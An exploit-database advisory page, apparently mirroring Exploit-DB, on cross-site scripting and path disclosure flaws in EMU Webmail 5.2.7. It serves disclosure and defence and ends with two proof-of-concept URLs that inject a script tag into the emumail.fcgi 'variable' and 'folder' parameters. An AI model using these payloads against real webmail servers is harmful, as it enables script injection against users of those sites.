header-logo
Suggest Exploit
vendor:
EMU Webmail
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-site Scripting
79
CWE
Product Name: EMU Webmail
Affected Version From: 5.2.2007
Affected Version To: 5.2.2007
Patch Exists: YES
Related CWE: N/A
CPE: a:emu_software:emu_webmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Multiple vulnerabilities in EMU Webmail 5.2.7

Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script.

Mitigation:

Input validation should be used to prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9861/info
 
Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script.
 
EMU Webmail 5.2.7 has been reported to be affected by these issues.

http://www.example.com/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert( %22G%22)%3C/script%3E
http://www.example.com/webmail/emumail.fcgi?passed=go_index&folder=<script>alert("G")</script>

Navigation

Suggest Exploit

Services By CQR